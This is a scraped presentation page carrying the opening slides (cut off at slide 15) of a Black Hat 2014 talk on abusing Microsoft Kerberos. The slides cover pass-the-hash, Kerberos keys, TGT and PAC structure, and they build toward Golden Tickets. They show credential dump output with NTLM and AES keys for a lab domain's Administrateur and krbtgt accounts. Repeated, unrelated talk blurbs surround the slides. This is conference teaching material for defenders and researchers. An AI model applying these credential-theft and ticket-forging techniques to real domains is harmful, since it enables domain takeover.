This document discusses abusing Microsoft Kerberos authentication. It begins with introductions of the presenters Alva "Skip" Duckwall and Benjamin Delpy. It then outlines what will be covered, including Windows Active Directory, mimikatz, NTLM hashes, Kerberos, pass-the-hash/keys/tickets and Golden Tickets. It also notes there will be 3 live demonstrations.
Abusing Microsoft Kerberos - Sorry you guys don't get itBenjamin Delpy
Talk of Skip Duckwall and I at BlackHat 2014 USA / Defcon Wall of Sheep.
Kerberos, and new pass-the-* feature, like overpass-the-hash and the Golden Ticket
Linux kernel TLS и HTTPS / Александр Крижановский (Tempesta Technologies)Ontico
HighLoad++ 2017
Зал «Москва», 7 ноября, 11:00
Тезисы:
http://www.highload.ru/2017/abstracts/3018.html
Наверное, уже ни для кого не секрет, что в Linux kernel интегрируется поддержка TLS: он уже есть в текущем RC Linux 4.13.
В докладе я хочу рассказать, зачем вносится TLS в ядро Linux и о подходах к Linux kernel TLS от Facebook/RedHat, Mellanox и нашего проекта Tempesta FW. Также рассажу о специфичных для ядра проблемах реализации TLS.
...
В докладе рассказывается о расширении для стека протоколов TCP/IP в ОС Linux, которое необходимо для того, чтобы HTTPS работал в том же стеке, что TCP и IP. DDoS-атаки такого типа как HTTP-флуд на уровне приложений, как правило, подавляются HTTP-акселераторами или балансировщиками нагрузки HTTP. Однако интерфейс сокетов Linux, используемый программным обеспечением, не дает той продуктивности, которая необходима при предельных нагрузках, вызванных DDoS-атаками. HTTP-серверы на базе стеков TCP/IP в пространстве пользователя становятся популярными в связи с увеличением их эффективности, но стеки TCP/IP представляют собой масштабный и сложный код, поэтому неблагоразумно реализовывать и исполнять его дважды — в пространстве пользователя и пространстве ядра. Стек TCP/IP в пространстве ядра хорошо интегрирован со многими мощными инструментами, например IPTables, IPVS, tc, tcpdump, которые недоступны для стека TCP/IP в пространстве пользователя или требуют сложных интерфейсов. Докладчик представит решение Tempesta FW, которое передает обработку HTTPS ядру. HTTPS встроен в стек TCP/IP Linux. Исполняя функцию межсетевого экрана HTTP, Tempesta FW устанавливает набор ограничений по скорости передачи и набор эвристических правил для защиты от таких атак как HTTPS-флуд и Slow HTTP.
This presentation, DEFEATING THE NETWORK SECURITY INFRASTRUCTURE v1.0.pdf, was made after some brainstorming
with some friends. The techniques used are not new and the tools readily available for download. The purpose of the discussion however
is to debate how internal enterprise resources might be (in)adversely exposed to the internet by in an insider using a combination of common techniques such as SSH and SSL.
Abusing Microsoft Kerberos - Sorry you guys don't get itBenjamin Delpy
Talk of Skip Duckwall and I at BlackHat 2014 USA / Defcon Wall of Sheep.
Kerberos, and new pass-the-* feature, like overpass-the-hash and the Golden Ticket
Linux kernel TLS и HTTPS / Александр Крижановский (Tempesta Technologies)Ontico
HighLoad++ 2017
Зал «Москва», 7 ноября, 11:00
Тезисы:
http://www.highload.ru/2017/abstracts/3018.html
Наверное, уже ни для кого не секрет, что в Linux kernel интегрируется поддержка TLS: он уже есть в текущем RC Linux 4.13.
В докладе я хочу рассказать, зачем вносится TLS в ядро Linux и о подходах к Linux kernel TLS от Facebook/RedHat, Mellanox и нашего проекта Tempesta FW. Также рассажу о специфичных для ядра проблемах реализации TLS.
...
В докладе рассказывается о расширении для стека протоколов TCP/IP в ОС Linux, которое необходимо для того, чтобы HTTPS работал в том же стеке, что TCP и IP. DDoS-атаки такого типа как HTTP-флуд на уровне приложений, как правило, подавляются HTTP-акселераторами или балансировщиками нагрузки HTTP. Однако интерфейс сокетов Linux, используемый программным обеспечением, не дает той продуктивности, которая необходима при предельных нагрузках, вызванных DDoS-атаками. HTTP-серверы на базе стеков TCP/IP в пространстве пользователя становятся популярными в связи с увеличением их эффективности, но стеки TCP/IP представляют собой масштабный и сложный код, поэтому неблагоразумно реализовывать и исполнять его дважды — в пространстве пользователя и пространстве ядра. Стек TCP/IP в пространстве ядра хорошо интегрирован со многими мощными инструментами, например IPTables, IPVS, tc, tcpdump, которые недоступны для стека TCP/IP в пространстве пользователя или требуют сложных интерфейсов. Докладчик представит решение Tempesta FW, которое передает обработку HTTPS ядру. HTTPS встроен в стек TCP/IP Linux. Исполняя функцию межсетевого экрана HTTP, Tempesta FW устанавливает набор ограничений по скорости передачи и набор эвристических правил для защиты от таких атак как HTTPS-флуд и Slow HTTP.
This presentation, DEFEATING THE NETWORK SECURITY INFRASTRUCTURE v1.0.pdf, was made after some brainstorming
with some friends. The techniques used are not new and the tools readily available for download. The purpose of the discussion however
is to debate how internal enterprise resources might be (in)adversely exposed to the internet by in an insider using a combination of common techniques such as SSH and SSL.
Мастер-класс "Логическая репликация и Avito" / Константин Евтеев, Михаил Тюр...Ontico
HighLoad++ 2017
Зал «Кейптаун», 7 ноября, 12:00
Тезисы:
http://www.highload.ru/2017/abstracts/2868.html
В Avito объявления хранятся в базах данных Postgres. При этом уже на протяжении многих лет активно применяется логическая репликация. С помощью неё успешно решаются вопросы роста объема данных и количества запросов к ним, масштабирования и распределения нагрузки, доставки данных в DWH и поисковые подсистемы, меж-базные и меж-сервисные синхронизации данных и пр.
...
In-depth list of attacks against various crypto implementations. Developers seem to have gotten the message not to design their own ciphers. Now, we're trying to get the message out that you shouldn't be implementing your own crypto protocols or constructions, using low-level crypto libraries. Instead, developers should work at a higher level, using libraries like GPGME, Keyczar, or cryptlib. If you do end up designing/implementing your own construction, getting it reviewed by a third party is an expensive but vital task.
How to Troubleshoot OpenStack Without Losing SleepSadique Puthen
The complex architecture, design, and difficulties while troubleshooting amplifies the effort in debugging a problem with an OpenStack environment. This can give administrators and support associates sleepless nights if OpenStack native and supporting components are not configured properly and tuned for optimum performance, especially with large deployments that involve high availability and load balancing.
Encrypting and decrypting, choosing a random number, signing and verifying -- it all seems so logical. But the road to hell is paved with good intentions and a copy of "Applied Cryptography".
This talk will cover recent crypto vulnerabilities in widely-deployed systems and how the smallest oversight resulted in catastrophe. You'll learn why public key crypto is like a Ford Pinto in a demolition derby, the meaning of "PBKDF2", and how Web 2.0 reinvented 1970's-style password hashing, badly. And maybe, just maybe, you'll leave with a newfound respect for the utter brittleness of even the simplest crypto.
Nate Lawson is the founder of Root Labs, which specializes in the design and analysis of embedded security and cryptography. Previously, he worked at Cryptography Research, analyzing cryptographic products and co-designing the Blu-ray content protection layer known as BD+.
Jugal Parikh, Microsoft
Holly Stewart, Microsoft
Humans are susceptible to social engineering. Machines are susceptible to tampering. Machine learning is vulnerable to adversarial attacks. Singular machine learning models can be “gamed” leading to unexpected outcomes.
In this talk, we’ll compare the difficulty of tampering with cloud-based models and client-based models. We then discuss how we developed stacked ensemble models to make our machine learning defenses less susceptible to tampering and significantly improve overall protection for our customers. We talk about the diversity of our base ML models and technical details on how they are optimized to handle different threat scenarios. Lastly, we’ll describe suspected tampering activity we’ve witnessed using protection telemetry from over half a billion computers, and whether our mitigation worked.
Docker Networking with New Ipvlan and Macvlan DriversBrent Salisbury
Docker Networking presentation at ONS2016.
Docker Macvlan and Ipvlan Networking Drivers Experimental Readme:
github.com/docker/docker/blob/master/experimental/vlan-networks.md
Kernel requirements for Ipvlan mode is v4.2+, Macvlan mode is v3.19.
If using Virtualbox to test with, use NAT mode interfaces unless you have multiple MAC addresses working in your setup. Use the 172.x.x.x subnet and gateway used by the VBox NAT network. Vmware Fusion works out of the box.
Here is a screenshot of a VirtualBox NAT interface:
https://www.dropbox.com/s/w1rf61n18y7q4f1/Screenshot%202016-03-20%2001.55.13.png?dl=0
Troubleshooting Tips from a Docker Support EngineerJeff Anderson
Troubleshooting is like going on an adventure. Here are some tips for how to tackle unexpected situations when using Docker.
These cases were pulled from the most common issues encountered while helping folks in the Docker community solve issues.
Мастер-класс "Логическая репликация и Avito" / Константин Евтеев, Михаил Тюр...Ontico
HighLoad++ 2017
Зал «Кейптаун», 7 ноября, 12:00
Тезисы:
http://www.highload.ru/2017/abstracts/2868.html
В Avito объявления хранятся в базах данных Postgres. При этом уже на протяжении многих лет активно применяется логическая репликация. С помощью неё успешно решаются вопросы роста объема данных и количества запросов к ним, масштабирования и распределения нагрузки, доставки данных в DWH и поисковые подсистемы, меж-базные и меж-сервисные синхронизации данных и пр.
...
In-depth list of attacks against various crypto implementations. Developers seem to have gotten the message not to design their own ciphers. Now, we're trying to get the message out that you shouldn't be implementing your own crypto protocols or constructions, using low-level crypto libraries. Instead, developers should work at a higher level, using libraries like GPGME, Keyczar, or cryptlib. If you do end up designing/implementing your own construction, getting it reviewed by a third party is an expensive but vital task.
How to Troubleshoot OpenStack Without Losing SleepSadique Puthen
The complex architecture, design, and difficulties while troubleshooting amplifies the effort in debugging a problem with an OpenStack environment. This can give administrators and support associates sleepless nights if OpenStack native and supporting components are not configured properly and tuned for optimum performance, especially with large deployments that involve high availability and load balancing.
Encrypting and decrypting, choosing a random number, signing and verifying -- it all seems so logical. But the road to hell is paved with good intentions and a copy of "Applied Cryptography".
This talk will cover recent crypto vulnerabilities in widely-deployed systems and how the smallest oversight resulted in catastrophe. You'll learn why public key crypto is like a Ford Pinto in a demolition derby, the meaning of "PBKDF2", and how Web 2.0 reinvented 1970's-style password hashing, badly. And maybe, just maybe, you'll leave with a newfound respect for the utter brittleness of even the simplest crypto.
Nate Lawson is the founder of Root Labs, which specializes in the design and analysis of embedded security and cryptography. Previously, he worked at Cryptography Research, analyzing cryptographic products and co-designing the Blu-ray content protection layer known as BD+.
Jugal Parikh, Microsoft
Holly Stewart, Microsoft
Humans are susceptible to social engineering. Machines are susceptible to tampering. Machine learning is vulnerable to adversarial attacks. Singular machine learning models can be “gamed” leading to unexpected outcomes.
In this talk, we’ll compare the difficulty of tampering with cloud-based models and client-based models. We then discuss how we developed stacked ensemble models to make our machine learning defenses less susceptible to tampering and significantly improve overall protection for our customers. We talk about the diversity of our base ML models and technical details on how they are optimized to handle different threat scenarios. Lastly, we’ll describe suspected tampering activity we’ve witnessed using protection telemetry from over half a billion computers, and whether our mitigation worked.
Docker Networking with New Ipvlan and Macvlan DriversBrent Salisbury
Docker Networking presentation at ONS2016.
Docker Macvlan and Ipvlan Networking Drivers Experimental Readme:
github.com/docker/docker/blob/master/experimental/vlan-networks.md
Kernel requirements for Ipvlan mode is v4.2+, Macvlan mode is v3.19.
If using Virtualbox to test with, use NAT mode interfaces unless you have multiple MAC addresses working in your setup. Use the 172.x.x.x subnet and gateway used by the VBox NAT network. Vmware Fusion works out of the box.
Here is a screenshot of a VirtualBox NAT interface:
https://www.dropbox.com/s/w1rf61n18y7q4f1/Screenshot%202016-03-20%2001.55.13.png?dl=0
Troubleshooting Tips from a Docker Support EngineerJeff Anderson
Troubleshooting is like going on an adventure. Here are some tips for how to tackle unexpected situations when using Docker.
These cases were pulled from the most common issues encountered while helping folks in the Docker community solve issues.
Redis - for duplicate detection on real time streamCodemotion
Roberto "frank" Franchini presenta a Codemotion Techmeetup Torino Redis, un data structure server che può utilizzare come chiavi stringhe, hashes, lists, sets, sorted sets, bitmaps e hyperloglogs
.
Velocity 2017 Performance analysis superpowers with Linux eBPFBrendan Gregg
Talk by for Velocity 2017 by Brendan Gregg: Performance analysis superpowers with Linux eBPF.
"Advanced performance observability and debugging have arrived built into the Linux 4.x series, thanks to enhancements to Berkeley Packet Filter (BPF, or eBPF) and the repurposing of its sandboxed virtual machine to provide programmatic capabilities to system tracing. Netflix has been investigating its use for new observability tools, monitoring, security uses, and more. This talk will investigate this new technology, which sooner or later will be available to everyone who uses Linux. The talk will dive deep on these new tracing, observability, and debugging capabilities. Whether you’re doing analysis over an ssh session, or via a monitoring GUI, BPF can be used to provide an efficient, custom, and deep level of detail into system and application performance.
This talk will also demonstrate the new open source tools that have been developed, which make use of kernel- and user-level dynamic tracing (kprobes and uprobes), and kernel- and user-level static tracing (tracepoints). These tools provide new insights for file system and storage performance, CPU scheduler performance, TCP performance, and a whole lot more. This is a major turning point for Linux systems engineering, as custom advanced performance instrumentation can be used safely in production environments, powering a new generation of tools and visualizations."
About the author: Priya Autee is software engineer at Intel working on various leading edge IA features and Intel(R) RDT expert. She is focused on prototyping and researching open source APIs like DPDK, Intel(R) RDT etc. to support NFV/compute sensitive requirements on Intel Architecture. She holds Masters in Computer Science from Arizona State University, Arizona.
Video: https://www.youtube.com/watch?v=JRFNIKUROPE . Talk for linux.conf.au 2017 (LCA2017) by Brendan Gregg, about Linux enhanced BPF (eBPF). Abstract:
A world of new capabilities is emerging for the Linux 4.x series, thanks to enhancements that have been included in Linux for to Berkeley Packet Filter (BPF): an in-kernel virtual machine that can execute user space-defined programs. It is finding uses for security auditing and enforcement, enhancing networking (including eXpress Data Path), and performance observability and troubleshooting. Many new open source tools that have been written in the past 12 months for performance analysis that use BPF. Tracing superpowers have finally arrived for Linux!
For its use with tracing, BPF provides the programmable capabilities to the existing tracing frameworks: kprobes, uprobes, and tracepoints. In particular, BPF allows timestamps to be recorded and compared from custom events, allowing latency to be studied in many new places: kernel and application internals. It also allows data to be efficiently summarized in-kernel, including as histograms. This has allowed dozens of new observability tools to be developed so far, including measuring latency distributions for file system I/O and run queue latency, printing details of storage device I/O and TCP retransmits, investigating blocked stack traces and memory leaks, and a whole lot more.
This talk will summarize BPF capabilities and use cases so far, and then focus on its use to enhance Linux tracing, especially with the open source bcc collection. bcc includes BPF versions of old classics, and many new tools, including execsnoop, opensnoop, funcccount, ext4slower, and more (many of which I developed). Perhaps you'd like to develop new tools, or use the existing tools to find performance wins large and small, especially when instrumenting areas that previously had zero visibility. I'll also summarize how we intend to use these new capabilities to enhance systems analysis at Netflix.
Adventures in Underland: Is encryption solid as a rock or a handful of dust?Paula Januszkiewicz
Encryption is based on three principals: algorithm, key length, and storage. It has also become more popular and it is more often built into databases, networks, config files, OS, and users’ secrets. Is DPAPI and DPAPI-NG enough for us? Unfortunately there are many slip-ups that can be made. Come and learn if ‘encrypted’ = or != ‘safe’ and when! Tools included.
Infrastructure review - Shining a light on the Black BoxMiklos Szel
Scenario: You work as a consultant and a new client has just signed on. Their DBA left suddenly leaving nothing but some outdated documentation in their wiki. After the kick-off meeting you realise that the operations and the development teams know little to none about the databases. They have been encountering intermittent problems with the application’s performance and suspect it’s related to the databases. You are told: "Please fix it ASAP!” So you have your public key installed on their jumphost and they manage to provide you with a 6 character long mysql root password. This is where your journey begins! During this session you will learn some of the best practices around discovering a new environment, finding possible threats and weaknesses and determining what key metrics to focus on for performance and reliability. We will cover architecture, replication, OS and MySQL level configuration, storage engines, failover strategies, backup and restores, monitoring, query tuning and possible ways to save money. The goal at the end of the presentation is to have a prioritized action plan. I will also explain the usage and the output of some tools/wrappers that help during an infrastructure review. Examples include creation of maximum integetr usage reports, table fragmentation and duplicate keys (we will be leveraging multiple Percona Toolkit scripts but also some lesser known tools as well). It is often easy to overlook underlying problems in the infrastructure during day-to-day operations, so this presentation will aim to highlight how to identify and resolve potential bottlenecks with your systems.
O'Reilly Velocity New York 2016 presentation on modern Linux tracing tools and technology. Highlights the available tracing data sources on Linux (ftrace, perf_events, BPF) and demonstrates some tools that can be used to obtain traces, including DebugFS, the perf front-end, and most importantly, the BCC/BPF tool collection.
Cryptography for Absolute Beginners (May 2019)Svetlin Nakov
Cryptography for Absolute Beginners
Svetlin Nakov @ Sofia Science Festival, May 2019
Video (Bulgarian language): https://youtu.be/-QzFcUkM7_4
Blog: https://nakov.com/blog/2019/05/13/cryptography-for-absolute-beginners-nakov-at-sofia-science-festival-may-2019/
Similar to Abusing Microsoft Kerberos - Sorry you guys don’t get it (20)
The economics is the best way to view attacker and defender strategies. The traditional approach to defense is to raise the cost for your attackers by making attacks as difficult as possible. This, unfortunately, has a tendency to raise costs for the defender and their users too and does not scale well.
High Definition Fuzzing; Exploring HDMI vulnerabilitiesE Hacking
Most modern Android-based phones and tablets have a Slimport(r) connection that supports HDMI-CEC like Samsung and HTC among mobile devices, and many JVC, Kenwood, Panasonic, and Sony car stereos and other 750 million devices in the world so far.
Exploiting Linux On 32-bit and 64-bit SystemsE Hacking
Dr. Hector Marco-Gisbert & Dr. Ismael Ripoll presented new techniques for exploiting the Linux, using its weaknesses.
http://www.ehacking.net/2016/06/exploiting-linux-on-32-bit-and-64-bit.html
The most important steps to become a hacker have been revealed. Learn the steps that are highly required to become a information security professional.
http://academy.ehacking.net/blog/125408/tips-to-become-a-hacker
Penetrating the Perimeter - Tales from the BattlefieldE Hacking
Presentation and demonstration by Phil Grimes at Central Ohio Infosec Summit 2016.
Read more about it:
http://www.ehacking.net/2016/05/penetrating-perimeter-tales-from.html
Finding ways to fingerprint the websites on tor project. Read more and see the video: http://www.ehacking.net/2016/02/website-fingerprinting-on-tor-attacks.html
The tool has been developed to be used inside a Linux environment. At the host system level, the only prerequisites are support for Python 2,7 or higher and the Android SDK.
Advanced Persistent Threat (APT) attacks are highly organised and are launched for prolonged periods. APT attacks exhibit discernible attributes or patterns.
Shodan is basically a search engine which helps to find (routers, switches, Scada etc.) mainly vulnerable systems on the internet .It is widely known as Google for hackers
It was launched in 2009 by computer programmer John Matherly. It is mainly a search engine of service banners in which metadata (data about data) is sent from the server to client. Shodan currently probes for 50+ ports.
Your machine (mobile phone, bluetooth device, router etc etc) may betrayed you and can be used to detect your position or even invade your privacy. They are watching you, stay alert.
Bluetooth is watching you, bluetooth is everywhere and they are tracking your every move. Learn how to detect the surveillance system. For hacking, for fun and for privacy.
Unmasking is the process to remove mask from the face and to reveal the real identity; at defcon17, Robert “RSnake” Hansen & Joshua “Jabra” Abraham have discussed the concept with demonstration
Sir I want to hack whatsapp chat ? Please give me a tutorial link. This question made me to write this simple POC tutorial to hack/steal whatsapp chats
http://www.ehacking.net/2014/09/poc-tutorial-of-stealing-whatsapp-chat.html
Presented by JP Dunning “.ronin” BlackHat Asia 2014; Demonstration of how to build a hardware based trojan at home. Create your own hardware of Trojan Virus. http://www.ehacking.net/2014/09/building-trojan-hardware-at-home.html
Social Media Monitoring tools as an OSINT platform for intelligenceE Hacking
This whitepaper discusses how social media monitoring tools can be applied as powerful and cost effective Open Source Intelligence (OSINT) platforms; and how they can support collection and analysis of relevant and targeted information relating to counter-terrorism, criminal and political open sources.
LDAP Services are a key component
in companies. The information stored in them
is used for corporate applications. If one of these
applications accepts input from a client and
execute it without first validating it, attackers h
ave the potential to execute their own
queries and thereby extract sensitive information f
rom the LDAP directory. In this paper a
deep analysis of the LDAP injection techniques is p
resented including Blind attacks
Dev Dives: Train smarter, not harder – active learning and UiPath LLMs for do...UiPathCommunity
💥 Speed, accuracy, and scaling – discover the superpowers of GenAI in action with UiPath Document Understanding and Communications Mining™:
See how to accelerate model training and optimize model performance with active learning
Learn about the latest enhancements to out-of-the-box document processing – with little to no training required
Get an exclusive demo of the new family of UiPath LLMs – GenAI models specialized for processing different types of documents and messages
This is a hands-on session specifically designed for automation developers and AI enthusiasts seeking to enhance their knowledge in leveraging the latest intelligent document processing capabilities offered by UiPath.
Speakers:
👨🏫 Andras Palfi, Senior Product Manager, UiPath
👩🏫 Lenka Dulovicova, Product Program Manager, UiPath
Accelerate your Kubernetes clusters with Varnish CachingThijs Feryn
A presentation about the usage and availability of Varnish on Kubernetes. This talk explores the capabilities of Varnish caching and shows how to use the Varnish Helm chart to deploy it to Kubernetes.
This presentation was delivered at K8SUG Singapore. See https://feryn.eu/presentations/accelerate-your-kubernetes-clusters-with-varnish-caching-k8sug-singapore-28-2024 for more details.
UiPath Test Automation using UiPath Test Suite series, part 3DianaGray10
Welcome to UiPath Test Automation using UiPath Test Suite series part 3. In this session, we will cover desktop automation along with UI automation.
Topics covered:
UI automation Introduction,
UI automation Sample
Desktop automation flow
Pradeep Chinnala, Senior Consultant Automation Developer @WonderBotz and UiPath MVP
Deepak Rai, Automation Practice Lead, Boundaryless Group and UiPath MVP
Builder.ai Founder Sachin Dev Duggal's Strategic Approach to Create an Innova...Ramesh Iyer
In today's fast-changing business world, Companies that adapt and embrace new ideas often need help to keep up with the competition. However, fostering a culture of innovation takes much work. It takes vision, leadership and willingness to take risks in the right proportion. Sachin Dev Duggal, co-founder of Builder.ai, has perfected the art of this balance, creating a company culture where creativity and growth are nurtured at each stage.
JMeter webinar - integration with InfluxDB and GrafanaRTTS
Watch this recorded webinar about real-time monitoring of application performance. See how to integrate Apache JMeter, the open-source leader in performance testing, with InfluxDB, the open-source time-series database, and Grafana, the open-source analytics and visualization application.
In this webinar, we will review the benefits of leveraging InfluxDB and Grafana when executing load tests and demonstrate how these tools are used to visualize performance metrics.
Length: 30 minutes
Session Overview
-------------------------------------------
During this webinar, we will cover the following topics while demonstrating the integrations of JMeter, InfluxDB and Grafana:
- What out-of-the-box solutions are available for real-time monitoring JMeter tests?
- What are the benefits of integrating InfluxDB and Grafana into the load testing stack?
- Which features are provided by Grafana?
- Demonstration of InfluxDB and Grafana using a practice web application
To view the webinar recording, go to:
https://www.rttsweb.com/jmeter-integration-webinar
LF Energy Webinar: Electrical Grid Modelling and Simulation Through PowSyBl -...DanBrown980551
Do you want to learn how to model and simulate an electrical network from scratch in under an hour?
Then welcome to this PowSyBl workshop, hosted by Rte, the French Transmission System Operator (TSO)!
During the webinar, you will discover the PowSyBl ecosystem as well as handle and study an electrical network through an interactive Python notebook.
PowSyBl is an open source project hosted by LF Energy, which offers a comprehensive set of features for electrical grid modelling and simulation. Among other advanced features, PowSyBl provides:
- A fully editable and extendable library for grid component modelling;
- Visualization tools to display your network;
- Grid simulation tools, such as power flows, security analyses (with or without remedial actions) and sensitivity analyses;
The framework is mostly written in Java, with a Python binding so that Python developers can access PowSyBl functionalities as well.
What you will learn during the webinar:
- For beginners: discover PowSyBl's functionalities through a quick general presentation and the notebook, without needing any expert coding skills;
- For advanced developers: master the skills to efficiently apply PowSyBl functionalities to your real-world scenarios.
State of ICS and IoT Cyber Threat Landscape Report 2024 previewPrayukth K V
The IoT and OT threat landscape report has been prepared by the Threat Research Team at Sectrio using data from Sectrio, cyber threat intelligence farming facilities spread across over 85 cities around the world. In addition, Sectrio also runs AI-based advanced threat and payload engagement facilities that serve as sinks to attract and engage sophisticated threat actors, and newer malware including new variants and latent threats that are at an earlier stage of development.
The latest edition of the OT/ICS and IoT security Threat Landscape Report 2024 also covers:
State of global ICS asset and network exposure
Sectoral targets and attacks as well as the cost of ransom
Global APT activity, AI usage, actor and tactic profiles, and implications
Rise in volumes of AI-powered cyberattacks
Major cyber events in 2024
Malware and malicious payload trends
Cyberattack types and targets
Vulnerability exploit attempts on CVEs
Attacks on counties – USA
Expansion of bot farms – how, where, and why
In-depth analysis of the cyber threat landscape across North America, South America, Europe, APAC, and the Middle East
Why are attacks on smart factories rising?
Cyber risk predictions
Axis of attacks – Europe
Systemic attacks in the Middle East
Download the full report from here:
https://sectrio.com/resources/ot-threat-landscape-reports/sectrio-releases-ot-ics-and-iot-security-threat-landscape-report-2024/
Smart TV Buyer Insights Survey 2024 by 91mobiles.pdf91mobiles
91mobiles recently conducted a Smart TV Buyer Insights Survey in which we asked over 3,000 respondents about the TV they own, aspects they look at on a new TV, and their TV buying preferences.
Elevating Tactical DDD Patterns Through Object CalisthenicsDorra BARTAGUIZ
After immersing yourself in the blue book and its red counterpart, attending DDD-focused conferences, and applying tactical patterns, you're left with a crucial question: How do I ensure my design is effective? Tactical patterns within Domain-Driven Design (DDD) serve as guiding principles for creating clear and manageable domain models. However, achieving success with these patterns requires additional guidance. Interestingly, we've observed that a set of constraints initially designed for training purposes remarkably aligns with effective pattern implementation, offering a more ‘mechanical’ approach. Let's explore together how Object Calisthenics can elevate the design of your tactical DDD patterns, offering concrete help for those venturing into DDD for the first time!
Generating a custom Ruby SDK for your web service or Rails API using Smithyg2nightmarescribd
Have you ever wanted a Ruby client API to communicate with your web service? Smithy is a protocol-agnostic language for defining services and SDKs. Smithy Ruby is an implementation of Smithy that generates a Ruby SDK using a Smithy model. In this talk, we will explore Smithy and Smithy Ruby to learn how to generate custom feature-rich SDKs that can communicate with any web service, such as a Rails JSON API.
Software Delivery At the Speed of AI: Inflectra Invests In AI-Powered QualityInflectra
In this insightful webinar, Inflectra explores how artificial intelligence (AI) is transforming software development and testing. Discover how AI-powered tools are revolutionizing every stage of the software development lifecycle (SDLC), from design and prototyping to testing, deployment, and monitoring.
Learn about:
• The Future of Testing: How AI is shifting testing towards verification, analysis, and higher-level skills, while reducing repetitive tasks.
• Test Automation: How AI-powered test case generation, optimization, and self-healing tests are making testing more efficient and effective.
• Visual Testing: Explore the emerging capabilities of AI in visual testing and how it's set to revolutionize UI verification.
• Inflectra's AI Solutions: See demonstrations of Inflectra's cutting-edge AI tools like the ChatGPT plugin and Azure Open AI platform, designed to streamline your testing process.
Whether you're a developer, tester, or QA professional, this webinar will give you valuable insights into how AI is shaping the future of software delivery.
4. • We’ll speak about:
– Windows, Active Directory
– mimikatz
– NTLM Hash
– Kerberos
– Pass-the-hash/keys/ticket
– Golden Ticket
• We’ll try: 3 live demos.
– All of that also works from a non domain-joined computer.
6. • Normal
• Pass-the-Hash
A little reminder
waza
1234/ NTLM (md4)
LM
cc36cf7a8514893e
fccd332446158b1a
d0e9aee149655a60
75e4540af1f22d3b
LSASS (msv1_0)
NTLM (md4)
LM
cc36cf7a8514893e
fccd332446158b1a
LSASS (msv1_0)
cc36cf7a8514893e
fccd332446158b1a
7. Cool isn’t it ? And it works like a charm
but with NTLM disabled or “Protected Users”?
8. *or maybe you only don’t want to leave
NTLM auth footprints in the Eventlog ;)
9. • It is all about keys and tickets
• For Example, let’s use Administrateur who wants to
access cifs on a win81 machine on chocolate.local
domain
• It needs 3 set of keys, all are in the Active Directory
– And by default, derived from password.
Kerberos
10. 1. The KDC long-term secret key (domain key)
– Under the mysterious krbtgt account (rc4, aes128, aes256, des…)
– Needed to sign Microsoft specific data in “PAC”, encrypt TGT
2. The Client long-term secret key (derived from password)
– Under the user/computer/server account
– Needed to check AS-REQ, encrypt session key
3. The Target/Service long-term secret key (derived from password)
– Under the computer/server account
– Needed to countersign data in “PAC” of TGS, encrypt TGS
Kerberos :: keys
12. • The KDC will validate the authentication if it can decrypt the timestamp with
the long-term user key (for RC4, the NTLM hash of the user password)
• It issues a TGT representing the user in the domain, for a specified period
Kerberos :: preauth
RID : 000001f4 (500)
User : Administrateur
* Primary
LM :
NTLM : cc36cf7a8514893efccd332446158b1a
* Kerberos-Newer-Keys
Default Salt : CHOCOLATE.LOCALAdministrateur
Default Iterations : 4096
Credentials
aes256_hmac (4096) : b7268361386090314acce8d9367e55f5
5865e7ef8e670fbe4262d6c94098a9e9
aes128_hmac (4096) : 8451bb37aa6d7ce3d2a5c2d24d317af3
des_cbc_md5 (4096) : f8fd987fa7153185
KDC
waza
1234/
rc4_hmac_nt
(NTLM/md4)
cc36cf7a8514893e
fccd332446158b1a
20140807054500Z
timestamp ① AS-REQ
② AS-REPTGT
13. • This TGT is encrypted with a key shared between all KDC
– The RC4 key for the krbtgt account : 310b643c5316c8c3c70a10cfb17e2e31
• The KDC adds a Microsoft specific PAC to a structure with user’s information
Kerberos :: TGT
RID : 000001f6 (502)
User : krbtgt
* Primary
LM :
NTLM : 310b643c5316c8c3c70a10cfb17e2e31
* Kerberos-Newer-Keys
Default Salt : CHOCOLATE.LOCALkrbtgt
Default Iterations : 4096
Credentials
aes256_hmac (4096) : 15540cac73e94028231ef86631bc47bd
5c827847ade468d6f6f739eb00c68e42
aes128_hmac (4096) : da3128afc899a298b72d365bd753dbfb
des_cbc_md5 (4096) : 620eb39e450e6776
KDC
TGT
Start/End/MaxRenew: 14/07/2014 00:46:09 ; 14/07/2014
10:46:09 ; 21/07/2014 00:46:09
Service Name (02) : krbtgt ; CHOCOLATE.LOCAL ; @
CHOCOLATE.LOCAL
Target Name (02) : krbtgt ; CHOCOLATE ; @
CHOCOLATE.LOCAL
Client Name (01) : Administrateur ; @
CHOCOLATE.LOCAL ( CHOCOLATE )
Flags 40e10000 : name_canonicalize ; pre_authent ;
initial ; renewable ; forwardable ;
Session Key : 0x00000012 - aes256_hmac
f3bf2e0e26903703bec6259b400a586f403bbfe3771cb7972be3c
0868cb9cc69
RC4-HMAC – krbtgt
310b643c5316c8c3c70a10cfb17e2e31
Username : Administrateur
Domain SID
S-1-5-21-130452501-2365100805-3685010670
Authorization data Microsoft (PAC)
CHECKSUM_SRV – HMAC_MD5 - krbtgt
310b643c5316c8c3c70a10cfb17e2e3
CHECKSUM_KDC – HMAC_MD5 - krbtgt
310b643c5316c8c3c70a10cfb17e2e3
14. • The KDC will create a Microsoft specific structure (PAC) with user information
• This PAC is signed with the target key, and the KDC key
– for a TGT, the target is also the KDC, so it is the same key, 310b643c5316c8c3c70a10cfb17e2e31 for RC4
– KDC keys are in the krbtgt account
Kerberos :: TGT :: PAC
RID : 000001f6 (502)
User : krbtgt
* Primary
LM :
NTLM : 310b643c5316c8c3c70a10cfb17e2e31
* Kerberos-Newer-Keys
Default Salt : CHOCOLATE.LOCALkrbtgt
Default Iterations : 4096
Credentials
aes256_hmac (4096) : 15540cac73e94028231ef86631bc47bd
5c827847ade468d6f6f739eb00c68e42
aes128_hmac (4096) : da3128afc899a298b72d365bd753dbfb
des_cbc_md5 (4096) : 620eb39e450e6776
KDC
Username : Administrateur
Domain SID
S-1-5-21-130452501-2365100805-3685010670
User ID
500 Administrateur
Groups ID
512 Admins du domaine
519 Administrateurs de l’entreprise
518 Administrateurs du schéma
…
Authorization data Microsoft (PAC)
CHECKSUM_SRV – HMAC_MD5 - krbtgt
310b643c5316c8c3c70a10cfb17e2e3
CHECKSUM_KDC – HMAC_MD5 - krbtgt
310b643c5316c8c3c70a10cfb17e2e3
15. Kerberos :: KRBTGT
RID : 000001f6 (502)
User : krbtgt
* Primary
LM :
NTLM : 310b643c5316c8c3c70a10cfb17e2e31
* Kerberos-Newer-Keys
Default Salt : CHOCOLATE.LOCALkrbtgt
Default Iterations : 4096
Credenti
